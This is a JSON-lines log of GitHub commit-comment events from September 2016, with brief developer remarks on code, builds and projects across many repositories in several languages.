{"id":"4545565040","type":"CommitCommentEvent","actor":{"login":"Klozz"},"repo":{"name":"XPerience-AOSP-Lollipop/android_device_motorola_msm8960dt-common"},"payload":{"comment":{"id":18976623,"position":null,"line":null,"path":null,"commit_id":"655453612b4526954e4fc0b0388ac59a7697b092","created_at":"2016-09-11T09:52:50Z","updated_at":"2016-09-11T09:52:50Z","body":"yeah i removed it on next commit "}},"created_at":"2016-09-11T09:52:50Z"}
{"id":"4545565636","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18976625,"position":null,"line":null,"path":null,"commit_id":"1bb24034889f74658bfaef8c760ccbc5e829c67f","created_at":"2016-09-11T09:53:22Z","updated_at":"2016-09-11T09:53:22Z","body":"To PRE."}},"created_at":"2016-09-11T09:53:22Z"}
{"id":"4545565705","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18976626,"position":null,"line":null,"path":null,"commit_id":"1bb24034889f74658bfaef8c760ccbc5e829c67f","created_at":"2016-09-11T09:53:26Z","updated_at":"2016-09-11T09:53:26Z","body":"To PRO."}},"created_at":"2016-09-11T09:53:26Z"}
{"id":"4545566088","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18976628,"position":null,"line":null,"path":null,"commit_id":"763a6da4f74349f947510bc9d62ff0330c8562b7","created_at":"2016-09-11T09:53:47Z","updated_at":"2016-09-11T09:53:47Z","body":"To PRE.\r\n"}},"created_at":"2016-09-11T09:53:47Z"}
{"id":"4545566170","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18976629,"position":null,"line":null,"path":null,"commit_id":"763a6da4f74349f947510bc9d62ff0330c8562b7","created_at":"2016-09-11T09:53:51Z","updated_at":"2016-09-11T09:53:51Z","body":"To PRO."}},"created_at":"2016-09-11T09:53:51Z"}
{"id":"4545566547","type":"CommitCommentEvent","actor":{"login":"thiderman"},"repo":{"name":"thiderman/drunkenfall"},"payload":{"comment":{"id":18976631,"position":29,"line":29,"path":"facebook.go","commit_id":"e89f05d538f5b55e5404e4da9b0a753aec5607b7","created_at":"2016-09-11T09:54:11Z","updated_at":"2016-09-11T09:54:11Z","body":"Sent in PM!"}},"created_at":"2016-09-11T09:54:11Z"}
{"id":"4545567025","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":18976633,"position":null,"line":null,"path":null,"commit_id":"4292c965e850eea41092189a1c350dd88d2ef170","created_at":"2016-09-11T09:54:37Z","updated_at":"2016-09-11T09:54:37Z","body":"uh ... that's for SR03, not RATE?^^"}},"created_at":"2016-09-11T09:54:37Z"}
{"id":"4545567159","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18976635,"position":3,"line":393,"path":"src/ride/vehicle.h","commit_id":"ba453db01f530eea3beb559d1b219e290fcdbd30","created_at":"2016-09-11T09:54:45Z","updated_at":"2016-09-11T09:54:45Z","body":"Any time I use underscore for a global its because I don't think it should be a global but it has to be for now, but it should remind me to change it later."}},"created_at":"2016-09-11T09:54:45Z"}
{"id":"4545567273","type":"CommitCommentEvent","actor":{"login":"GeoD1302"},"repo":{"name":"GeoD1302/Fotoportfolio"},"payload":{"comment":{"id":18976636,"position":null,"line":null,"path":null,"commit_id":"2cef80012694241a7ed2aa9d7affe7d7d2f53237","created_at":"2016-09-11T09:54:51Z","updated_at":"2016-09-11T09:54:51Z","body":"Mäh, der war leer 😂"}},"created_at":"2016-09-11T09:54:51Z"}
{"id":"4545567354","type":"CommitCommentEvent","actor":{"login":"gordonkoehn"},"repo":{"name":"nyxxsudios/caelum"},"payload":{"comment":{"id":18976637,"position":null,"line":null,"path":null,"commit_id":"30c1475a28a302021e67a07586e5628c8e369996","created_at":"2016-09-11T09:54:54Z","updated_at":"2016-09-11T09:54:54Z","body":"It would be the best if we really only push&commit the changes we intentionally made, not all automatic layout changes that are done by your android studio in the project setting files. This may avoid future merge conflicts."}},"created_at":"2016-09-11T09:54:54Z"}
{"id":"4545568009","type":"CommitCommentEvent","actor":{"login":"Droxiensn"},"repo":{"name":"Droxiensn/Book"},"payload":{"comment":{"id":18976638,"position":null,"line":null,"path":null,"commit_id":"1fa86daed58c1c27bef3363a15f544057e75f108","created_at":"2016-09-11T09:55:28Z","updated_at":"2016-09-11T09:55:28Z","body":"链接"}},"created_at":"2016-09-11T09:55:28Z"}
{"id":"4545569002","type":"CommitCommentEvent","actor":{"login":"clearkimura"},"repo":{"name":"clearkimura/Customizer"},"payload":{"comment":{"id":18976639,"position":null,"line":null,"path":null,"commit_id":"cefca0d5504f02cee3db14b6f134e5181919053c","created_at":"2016-09-11T09:56:27Z","updated_at":"2016-09-11T09:56:27Z","body":"@fluxer \r\nYesterday, I have created proper release [4.1.2](https://github.com/clearkimura/Customizer/releases/tag/4.1.2), which automatically incorporates changes made to fix many issues, including issue #103 (Jun 21, 2015). As a result, the branch 103 is now stale and made redundant. Hence, I seek your permission: Is it okay to delete [branch 103](https://github.com/clearkimura/Customizer/tree/103)?"}},"created_at":"2016-09-11T09:56:27Z"}
{"id":"4545569440","type":"CommitCommentEvent","actor":{"login":"genesixx"},"repo":{"name":"lg-devs/android_device_lge_g5-common"},"payload":{"comment":{"id":18976642,"position":null,"line":null,"path":null,"commit_id":"ef69db7e3912c2d0874746217831ba27c4b90a95","created_at":"2016-09-11T09:56:52Z","updated_at":"2016-09-11T09:56:52Z","body":"op commit name"}},"created_at":"2016-09-11T09:56:52Z"}
{"id":"4545570996","type":"CommitCommentEvent","actor":{"login":"fabiopozzi"},"repo":{"name":"fabiopozzi/gobyexample-it"},"payload":{"comment":{"id":18976643,"position":null,"line":null,"path":null,"commit_id":"0c7e07c481ea404d53fe6eb68b5eca5cb674d49c","created_at":"2016-09-11T09:58:19Z","updated_at":"2016-09-11T09:58:19Z","body":"Ho tentato di rendere più chiaro il passaggio sulla differenza tra C e go."}},"created_at":"2016-09-11T09:58:19Z"}
{"id":"4545571294","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"kkirby/gorillascript"},"payload":{"comment":{"id":18976644,"position":null,"line":null,"path":null,"commit_id":"c372a4bed9b1055ad45b86e750b30df3f39e93e9","created_at":"2016-09-11T09:58:37Z","updated_at":"2016-09-11T09:58:37Z","body":":+1:"}},"created_at":"2016-09-11T09:58:37Z"}
{"id":"4546767202","type":"CommitCommentEvent","actor":{"login":"ImperialPint"},"repo":{"name":"ImperialPint/ideabox"},"payload":{"comment":{"id":18978628,"position":null,"line":null,"path":null,"commit_id":"065c2214d2a8693b17cd223ce7c44d9f9c2f40bb","created_at":"2016-09-12T00:00:56Z","updated_at":"2016-09-12T00:00:56Z","body":"Removing\r\n"}},"created_at":"2016-09-12T00:00:56Z"}
{"id":"4546767930","type":"CommitCommentEvent","actor":{"login":"septemus"},"repo":{"name":"pardeike/RimWorld-Achtung-Mod"},"payload":{"comment":{"id":18978629,"position":45,"line":13,"path":"Source/AchtungMod/Controller.cs","commit_id":"7f285844f90ea675bd7fa0d722e0696b2d6bf2e9","created_at":"2016-09-12T00:01:26Z","updated_at":"2016-09-12T00:01:26Z","body":"Should this be enabled?"}},"created_at":"2016-09-12T00:01:26Z"}
{"id":"4546768162","type":"CommitCommentEvent","actor":{"login":"lambda2016"},"repo":{"name":"lambda2016/javascripTutor"},"payload":{"comment":{"id":18978630,"position":null,"line":null,"path":null,"commit_id":"d4a44c991e6ae93ff4fbb0e5ca48547ae13e9b24","created_at":"2016-09-12T00:01:38Z","updated_at":"2016-09-12T00:01:38Z","body":"Working on a simple js calculator for JavaScript tutors. This is ideal for beginner assignment to evaluate student understanding of Javascript"}},"created_at":"2016-09-12T00:01:38Z"}
{"id":"4546768361","type":"CommitCommentEvent","actor":{"login":"austinzhang1018"},"repo":{"name":"AvalancheRobotics/Avalanche-2017"},"payload":{"comment":{"id":18978631,"position":null,"line":null,"path":null,"commit_id":"474bd75814d555e93fba24e3944a145ada5cf95a","created_at":"2016-09-12T00:01:47Z","updated_at":"2016-09-12T00:01:47Z","body":"*for, whoops."}},"created_at":"2016-09-12T00:01:47Z"}
{"id":"4546771848","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18978632,"position":null,"line":null,"path":null,"commit_id":"cec32071034de73cdd2562852f32f6f0ab9bd846","created_at":"2016-09-12T00:04:00Z","updated_at":"2016-09-12T00:04:00Z","body":"@SubJunk @valib  Why it was hardcoded and not set into the PS3 configuration file ?\r\nhttps://github.com/UniversalMediaServer/UniversalMediaServer/blob/6503be51d6b1094086c2d7f623d256da66bec141/src/main/java/net/pms/dlna/DLNAResource.java#L1863-L1869\r\n\r\nExamples: \r\nm:video/x-divx;DLNA.ORG_PN=AVI\r\nSupported = f:wmv      v:wmv|vc1     a:wma      m:video/x-ms-wmv         n:2       h:700\r\nSupported = f:wmv      v:wmv|vc1     a:wma      m:video/x-ms-wmv;DLNA.ORG_PN=WMVHIGH_PRO      n:2"}},"created_at":"2016-09-12T00:04:00Z"}
{"id":"4546773268","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"midwan/uae4arm-rpi"},"payload":{"comment":{"id":18978634,"position":null,"line":null,"path":null,"commit_id":"909604663bc8d211ab47b0b1a58cc8d182429ce6","created_at":"2016-09-12T00:05:00Z","updated_at":"2016-09-12T00:05:00Z","body":"Related to #3 "}},"created_at":"2016-09-12T00:05:00Z"}
{"id":"4546775021","type":"CommitCommentEvent","actor":{"login":"sunag"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18978637,"position":247,"line":247,"path":"examples/js/nodes/NodeBuilder.js","commit_id":"c451cfa113fb1eb24eb2a41cd62adaa9faa3f078","created_at":"2016-09-12T00:06:13Z","updated_at":"2016-09-12T00:06:13Z","body":"> Shouldn't this use the triple equals sign comparator === instead of == ?\r\n\r\nIs a string comparation, only if by formality. There will be no difference to this case."}},"created_at":"2016-09-12T00:06:13Z"}
{"id":"4546775232","type":"CommitCommentEvent","actor":{"login":"sunny3728"},"repo":{"name":"sunny3728/high-school-projects"},"payload":{"comment":{"id":18978639,"position":null,"line":null,"path":null,"commit_id":"2e965e444a8cadce421b8dac6a40120ab2032948","created_at":"2016-09-12T00:06:22Z","updated_at":"2016-09-12T00:06:22Z","body":"Written in AP Computer Science"}},"created_at":"2016-09-12T00:06:22Z"}
{"id":"4546775988","type":"CommitCommentEvent","actor":{"login":"hyumayamaguchi"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18978640,"position":null,"line":null,"path":null,"commit_id":"18844bc65229786b96b89a9fc7739c0fc897905e","created_at":"2016-09-12T00:06:55Z","updated_at":"2016-09-12T00:06:55Z","body":"Hell, Kon nichi wa, Swift."}},"created_at":"2016-09-12T00:06:55Z"}
{"id":"4546776696","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":18978641,"position":null,"line":null,"path":null,"commit_id":"704f4a011db1037e2a4a0613c09ce7aa90468520","created_at":"2016-09-12T00:07:25Z","updated_at":"2016-09-12T00:07:25Z","body":"This closes https://github.com/perl6/doc/issues/887, doesn't it?"}},"created_at":"2016-09-12T00:07:25Z"}
{"id":"4546776798","type":"CommitCommentEvent","actor":{"login":"hyumayamaguchi"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18978642,"position":null,"line":null,"path":null,"commit_id":"18844bc65229786b96b89a9fc7739c0fc897905e","created_at":"2016-09-12T00:07:29Z","updated_at":"2016-09-12T00:07:29Z","body":"Hello, こんにちは, Swift!"}},"created_at":"2016-09-12T00:07:29Z"}
{"id":"4546777982","type":"CommitCommentEvent","actor":{"login":"voron00"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18978644,"position":null,"line":null,"path":null,"commit_id":"f12d88a8adc19714da8b8b1888f031687e6d4550","created_at":"2016-09-12T00:08:19Z","updated_at":"2016-09-12T00:08:19Z","body":"But isn't vulkan requires updated adreno libs?"}},"created_at":"2016-09-12T00:08:19Z"}
{"id":"4546779205","type":"CommitCommentEvent","actor":{"login":"Grarak"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18978648,"position":null,"line":null,"path":null,"commit_id":"f12d88a8adc19714da8b8b1888f031687e6d4550","created_at":"2016-09-12T00:09:18Z","updated_at":"2016-09-12T00:09:18Z","body":"blobs are already updated."}},"created_at":"2016-09-12T00:09:18Z"}
{"id":"4546781592","type":"CommitCommentEvent","actor":{"login":"marptt"},"repo":{"name":"kristoferB/SP"},"payload":{"comment":{"id":18978649,"position":null,"line":null,"path":null,"commit_id":"d72f1637208a05a4fa28f137a1d0196ba4a80b2e","created_at":"2016-09-12T00:10:54Z","updated_at":"2016-09-12T00:10:54Z","body":"i did not intend to push this and i'm too scared to delete things from the remote"}},"created_at":"2016-09-12T00:10:54Z"}
{"id":"4546781762","type":"CommitCommentEvent","actor":{"login":"voron00"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18978650,"position":null,"line":null,"path":null,"commit_id":"f12d88a8adc19714da8b8b1888f031687e6d4550","created_at":"2016-09-12T00:11:01Z","updated_at":"2016-09-12T00:11:01Z","body":"Ah k. Didn't saw that."}},"created_at":"2016-09-12T00:11:01Z"}
{"id":"4546782866","type":"CommitCommentEvent","actor":{"login":"leezer3"},"repo":{"name":"leezer3/OpenBVE"},"payload":{"comment":{"id":18978651,"position":null,"line":null,"path":null,"commit_id":"5e0161cb0eb2795ed9ebef024ad3b3eee5d6f376","created_at":"2016-09-12T00:11:45Z","updated_at":"2016-09-12T00:11:45Z","body":"Very slight loosening of the parser to fix a few more routes.\r\n\r\nPreviously, this didn't work, as it specifically required a whitespace character after the closing bracket:\r\n```.freeobj(225)Binley\\Bridges\\tunnel_approach_wall_right_1_modified.csv,```"}},"created_at":"2016-09-12T00:11:45Z"}
{"id":"4546786252","type":"CommitCommentEvent","actor":{"login":"dannylhy"},"repo":{"name":"pundit-project/pundit"},"payload":{"comment":{"id":18978655,"position":21,"line":974,"path":"pundit_agent/lib/PuNDIT/Agent/Detection.pm","commit_id":"c59a23947c4302523a81b4110ba62130e6a38dcd","created_at":"2016-09-12T00:14:06Z","updated_at":"2016-09-12T00:14:06Z","body":"Fixes the case of short timeseries causing false positives for route changes"}},"created_at":"2016-09-12T00:14:06Z"}
{"id":"4546787250","type":"CommitCommentEvent","actor":{"login":"teddyfrozevelt"},"repo":{"name":"teddyfrozevelt/robostangs-team-548"},"payload":{"comment":{"id":18978656,"position":null,"line":null,"path":null,"commit_id":"316a2332bb1cf850b07f20bb495a42670d0cde63","created_at":"2016-09-12T00:14:51Z","updated_at":"2016-09-12T00:14:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;UlsLyKwL&#x2F;7-github\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> github</a>"}},"created_at":"2016-09-12T00:14:51Z"}
{"id":"4546790888","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_kernel_samsung_vivalto3gvn"},"payload":{"comment":{"id":18978660,"position":null,"line":null,"path":null,"commit_id":"cbf4ef253998d99e2c3d38edccc45d2596a23c2b","created_at":"2016-09-12T00:17:23Z","updated_at":"2016-09-12T00:17:23Z","body":"Or the ROM this args in BoardConifg.mk to set comdline using mkbootimg.\nSome how my board just ignore args set by mkbootimg so I append hw arg an\nother args to the cmdline here. Of couse, it works!\n\n2016-09-12 3:00 GMT+07:00 Avinaba Dalal <notifications@github.com>:\n\n> It really works?\n> Then it would be a terrific solution to the hack\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_kernel_samsung_vivalto3gvn/commit/cbf4ef253998d99e2c3d38edccc45d2596a23c2b#commitcomment-18977926>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9kHVidIfX2Gna5DMsC37zbny_Pv3ks5qpF3AgaJpZM4J6FwX>\n> .\n>\n"}},"created_at":"2016-09-12T00:17:23Z"}
{"id":"4546792536","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978661,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:18:31Z","updated_at":"2016-09-12T00:18:31Z","body":"@JoinRajuncraftNow "}},"created_at":"2016-09-12T00:18:31Z"}
{"id":"4546792598","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978662,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:18:33Z","updated_at":"2016-09-12T00:18:33Z","body":"@"}},"created_at":"2016-09-12T00:18:33Z"}
{"id":"4546792673","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978663,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:18:35Z","updated_at":"2016-09-12T00:18:35Z","body":"@JoinRajuncraftNow "}},"created_at":"2016-09-12T00:18:35Z"}
{"id":"4546792737","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978664,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:18:38Z","updated_at":"2016-09-12T00:18:38Z","body":"@JoinRajuncraftNow "}},"created_at":"2016-09-12T00:18:38Z"}
{"id":"4546792804","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978665,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:18:40Z","updated_at":"2016-09-12T00:18:40Z","body":"@JoinRajuncraftNow "}},"created_at":"2016-09-12T00:18:40Z"}
{"id":"4546793084","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978666,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:18:53Z","updated_at":"2016-09-12T00:18:53Z","body":"Hello?\r\nShould I spam every conversation?"}},"created_at":"2016-09-12T00:18:53Z"}
{"id":"4546795073","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"ErikBoesen/FRCNewTab"},"payload":{"comment":{"id":18978668,"position":null,"line":null,"path":null,"commit_id":"89ffa5040b582c13f5ed9757d4ee222c4446da6c","created_at":"2016-09-12T00:20:18Z","updated_at":"2016-09-12T00:20:18Z","body":"Resolves #17 "}},"created_at":"2016-09-12T00:20:18Z"}
{"id":"4546796053","type":"CommitCommentEvent","actor":{"login":"bokatan"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18978670,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-12T00:20:58Z","updated_at":"2016-09-12T00:20:58Z","body":"@alolmeha I'm not wrong. Just because you create another wheel, does not mean you OWN the INTELLECTUAL PROPERTY COPYRIGHT of the content of the materials. It's unoriginal. Requires no thought or purpose to it. It is not creative. Why can't you create your own art out of your own mind rather than stealing art from a movie's or TV show's for your art creative content? And if you post it on the internet, it's too late to complain about posters doing what they do to the work. Tumblr should not threaten deletion of accounts for reblog/resharing a movie's or TV show's creation of their characters drawn by another FAN in FAN ART when the FAN does not own it. All the FAN did is help the distribution and production companies and that's more marketing dollars for them. Fan artist need to understand that fact. "}},"created_at":"2016-09-12T00:20:58Z"}
{"id":"4546798875","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978674,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:22:58Z","updated_at":"2016-09-12T00:22:58Z","body":"@dzxx36gyy 你电脑坏了"}},"created_at":"2016-09-12T00:22:58Z"}
{"id":"4546799356","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":18978676,"position":null,"line":null,"path":null,"commit_id":"93f39efe3ef0ce9c25ef09ebef60ad2dfc1fe7f3","created_at":"2016-09-12T00:23:21Z","updated_at":"2016-09-12T00:23:21Z","body":"That must be an oversight.  In some later version, the CustomerForm was deleted from Views/Movies. "}},"created_at":"2016-09-12T00:23:21Z"}
{"id":"4546800714","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978677,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:24:19Z","updated_at":"2016-09-12T00:24:19Z","body":"@yaalsn 😱"}},"created_at":"2016-09-12T00:24:19Z"}
{"id":"4546800808","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/fajita"},"payload":{"comment":{"id":18978678,"position":15,"line":220,"path":"app/routes.js","commit_id":"c965b0390598e01582fa57e130aaefdcb1ea5c76","created_at":"2016-09-12T00:24:23Z","updated_at":"2016-09-12T00:24:23Z","body":"if not find the sentence, return this json object and then the front end will test it and give an alert message"}},"created_at":"2016-09-12T00:24:23Z"}
{"id":"4546801881","type":"CommitCommentEvent","actor":{"login":"DanielBaird"},"repo":{"name":"franciscop/cookies.js"},"payload":{"comment":{"id":18978680,"position":3,"line":3,"path":"bower.json","commit_id":"fd4b02b6b5dc8d26cd91a97d9c2c83a8e68a99a3","created_at":"2016-09-12T00:25:11Z","updated_at":"2016-09-12T00:25:11Z","body":"... this person randomly commented a bit on nonsense on a pull req of mine, too. Can't tell why"}},"created_at":"2016-09-12T00:25:11Z"}
{"id":"4546802583","type":"CommitCommentEvent","actor":{"login":"kayceeanyanwu"},"repo":{"name":"kayceeanyanwu/AEDC"},"payload":{"comment":{"id":18978682,"position":null,"line":null,"path":null,"commit_id":"e04e07691487e6cc2f233f20027d379e258b2aaa","created_at":"2016-09-12T00:25:43Z","updated_at":"2016-09-12T00:25:43Z","body":"# AEDC\r\nAEDC In-house Apps\r\nThis is a test"}},"created_at":"2016-09-12T00:25:43Z"}
{"id":"4546805081","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978687,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:27:23Z","updated_at":"2016-09-12T00:27:23Z","body":"@dzxx36gyy 你在北苑？"}},"created_at":"2016-09-12T00:27:23Z"}
{"id":"4546806290","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978689,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T00:28:15Z","updated_at":"2016-09-12T00:28:15Z","body":"No"}},"created_at":"2016-09-12T00:28:15Z"}
{"id":"4546806993","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978691,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:28:44Z","updated_at":"2016-09-12T00:28:44Z","body":"@yaalsn 南苑"}},"created_at":"2016-09-12T00:28:44Z"}
{"id":"4546808979","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978694,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:30:09Z","updated_at":"2016-09-12T00:30:09Z","body":"@dzxx36gyy 一定是因为阴气太重23333"}},"created_at":"2016-09-12T00:30:09Z"}
{"id":"4546811581","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978697,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:31:48Z","updated_at":"2016-09-12T00:31:48Z","body":"@dzxx36gyy 把脚本发我下，加上你的配置，yaalsn@gmail.com"}},"created_at":"2016-09-12T00:31:48Z"}
{"id":"4546813256","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978698,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:32:52Z","updated_at":"2016-09-12T00:32:52Z","body":"@yaalsn 喂喂喂，我不在经信啊，全是男生，阳气爆棚"}},"created_at":"2016-09-12T00:32:52Z"}
{"id":"4546814071","type":"CommitCommentEvent","actor":{"login":"ecogrammer"},"repo":{"name":"ito-artsfarm/itoartsfarm2016-wp"},"payload":{"comment":{"id":18978699,"position":null,"line":null,"path":null,"commit_id":"705e9540d260cfcd9545bbbfb043f0e68459ae21","created_at":"2016-09-12T00:33:27Z","updated_at":"2016-09-12T00:33:27Z","body":"@makizonokenji \r\nこちらも反映させましたー"}},"created_at":"2016-09-12T00:33:27Z"}
{"id":"4546817222","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18978708,"position":null,"line":null,"path":null,"commit_id":"aef05274c6ce65825c54bf2cfc53e43db43028c2","created_at":"2016-09-12T00:35:36Z","updated_at":"2016-09-12T00:35:36Z","body":"We have to give users migration paths and choices.\r\n\r\nDLIES and ECIES interop will be in effect by default."}},"created_at":"2016-09-12T00:35:36Z"}
{"id":"4546819670","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978725,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:37:18Z","updated_at":"2016-09-12T00:37:18Z","body":"@yaalsn 就是改了账号 密码 mac host_ip host_os host_name啊，auth server用的也是10.100.61.3，理论上应该没啥问题来着，直接把下面IS_TEST打开把配置改在上方也不行，话说你自己是可以吗……我以为你没测试来着"}},"created_at":"2016-09-12T00:37:18Z"}
{"id":"4546820606","type":"CommitCommentEvent","actor":{"login":"n0f3"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18978891,"position":64,"line":58,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-12T00:37:50Z","updated_at":"2016-09-12T00:37:50Z","body":"is that something commonly? I actually put it as let because one of the tests was complaining about it and saying that it can't be constant, do you know if maybe there is some sort of incompatibility with tests and const? like things to watch out?"}},"created_at":"2016-09-12T00:37:50Z"}
{"id":"4546821273","type":"CommitCommentEvent","actor":{"login":"n0f3"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18978893,"position":73,"line":65,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-12T00:38:16Z","updated_at":"2016-09-12T00:38:16Z","body":"see my comment above\r\n"}},"created_at":"2016-09-12T00:38:16Z"}
{"id":"4546822378","type":"CommitCommentEvent","actor":{"login":"agross"},"repo":{"name":"firehol/netdata"},"payload":{"comment":{"id":18978896,"position":19,"line":28,"path":"conf.d/health_alarm_notify.conf","commit_id":"512266bf55bf13f076a73dba2ace264e9f81163a","created_at":"2016-09-12T00:38:59Z","updated_at":"2016-09-12T00:38:59Z","body":"Does it need a comma or should this line be deleted?"}},"created_at":"2016-09-12T00:38:59Z"}
{"id":"4546822818","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978899,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-12T00:39:17Z","updated_at":"2016-09-12T00:39:17Z","body":"@dzxx36gyy 已经在路由器里稳定运行三天了～"}},"created_at":"2016-09-12T00:39:17Z"}
{"id":"4546822926","type":"CommitCommentEvent","actor":{"login":"n0f3"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18978900,"position":9,"line":7,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-12T00:39:23Z","updated_at":"2016-09-12T00:39:23Z","body":"that sounds great for a second contribution, I actually thought about those cases myself so thanks for pointing out and providing more info! :+1: "}},"created_at":"2016-09-12T00:39:23Z"}
